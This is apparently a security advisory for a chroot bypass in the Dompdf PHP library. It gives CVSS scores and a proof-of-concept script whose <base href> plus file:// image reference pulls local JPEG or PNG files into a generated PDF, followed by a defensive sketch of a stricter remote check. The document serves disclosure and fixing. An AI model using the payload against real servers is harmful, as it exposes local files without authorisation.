CVSS3: 5.3 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

EPSS: 0.001 Low
Percentile: 29.2%
The Scenario 3 you described in this report (https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/) actually opens up the ability to bypass chroot checks.
1: Make sure you install Dompdf from GitHub (https://github.com/dompdf/dompdf/) and use the following as dompdf/autoload.inc.php:
<?php
/**
 * @package dompdf
 * @link http://dompdf.github.com/
 * @author Benj Carson <benjcarson@digitaljunkies.ca>
 * @author Fabien Ménager <fabien.menager@gmail.com>
 * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
 */

// HTML5 Parser
require_once __DIR__ . '/lib/html5lib/Parser.php';

// Sabberworm
spl_autoload_register(function($class)
{
    if (strpos($class, 'Sabberworm') !== false) {
        $file = str_replace('\\', DIRECTORY_SEPARATOR, $class);
        $file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php');
        if (file_exists($file)) {
            require_once $file;
            return true;
        }
    }
    return false;
});

// php-font-lib
require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php';

// php-svg-lib
require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php';

/*
 * New PHP 5.3.0 namespaced autoloader
 */
require_once __DIR__ . '/src/Autoloader.php';
Dompdf\Autoloader::register();
2: Place a sample image file cat.jpg at /var/www/html/cat.jpg (any photo will do).
3: Create vuln2.php:
<?php
// Include autoloader
require_once 'dompdf/autoload.inc.php';

// Reference the Dompdf namespace
use Dompdf\Dompdf;
use Dompdf\Options;

$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);

// Load HTML content: an http:// base combined with a file:// image reference
$dompdf->loadHtml('<base href="http://example.com"><img src="file:///var/www/html/cat.jpg" />');

// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape');

// Render the HTML as PDF
$dompdf->render();

// Output the generated PDF to Browser
$dompdf->stream();
?>
If you visit the above in the browser, you should see the cat.jpg image being included in the PDF file even though the chroot option is not set.
This vulnerability is capable of bypassing chroot checks, essentially leading to the disclosure of PNG and JPEG files. This was tested with allow_url_fopen and on Linux. Additionally, this was tested on a fresh install of dompdf.
This bug occurs because in Line 68:
$remote = ($protocol && $protocol !== "file://") || ($parsed_url['protocol'] != "");
($protocol && $protocol !== "file://") => true (http:// !== file://)
Therefore, file:///var/www/html/cat.jpg will be treated as a remote file without the need for chroot checks.
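The two decisions the report describes, as an added example that is not dompdf's own code (the function names, and the use of the temp directory as a stand-in chroot, are assumptions): the quoted `$remote` expression next to a scheme-based alternative, and a realpath-based chroot check for paths classified as local.

```php
<?php
// Added illustration, not dompdf's own code; function names are hypothetical. It models
// the report's two decisions: is a resource URL "remote", and is a local path inside the chroot.
// Scheme of a URL, e.g. "http://" or "file://"; "" when the URL is relative.
function url_scheme(string $url): string
{
    return preg_match('#^([a-z][a-z0-9+.\-]*://)#i', $url, $m) ? strtolower($m[1]) : '';
}

// Remote test modelled on the expression quoted in the report. With an http:// <base href> the
// first clause is already true (http:// !== file://), so a file:// <img src> never reaches the chroot check.
function is_remote_reported(string $base_protocol, string $url): bool
{
    $protocol = strtolower($base_protocol);
    $url_protocol = url_scheme($url);   // plays the role of $parsed_url['protocol']
    return ($protocol && $protocol !== 'file://') || ($url_protocol != '');
}

// Stricter test: the scheme of the URL that will actually be fetched decides. A URL with
// its own scheme is judged by that scheme; a relative one inherits the base protocol.
function is_remote_strict(string $base_protocol, string $url): bool
{
    $effective = url_scheme($url) ?: strtolower($base_protocol);
    return $effective !== '' && $effective !== 'file://';
}

// Chroot check for local paths: canonicalise both sides with realpath() so symlinks
// and ".." cannot escape, then require the file to sit under the chroot directory.
function inside_chroot(string $path, string $chroot): bool
{
    $real_chroot = realpath($chroot);
    $real_path = realpath($path);
    if ($real_chroot === false || $real_path === false) {
        return false;   // missing file or chroot: deny rather than guess
    }
    $prefix = rtrim($real_chroot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real_path, $prefix, strlen($prefix)) === 0;
}

// Constructed inputs mirroring the report: an http:// <base href> and a file:// <img src>.
$base = 'http://';
$img = 'file:///var/www/html/cat.jpg';
var_dump(is_remote_reported($base, $img));   // reported check: remote, chroot skipped
var_dump(is_remote_strict($base, $img));     // strict check: local, chroot applies
// The chroot check then applies to local files: a file created under the temp directory
// (used here as the chroot) is accepted, while a path outside it is rejected.
$chroot = sys_get_temp_dir();
$inside = tempnam($chroot, 'dompdf-');
var_dump(inside_chroot($inside, $chroot));
var_dump(inside_chroot('/etc/passwd', $chroot));
unlink($inside);
```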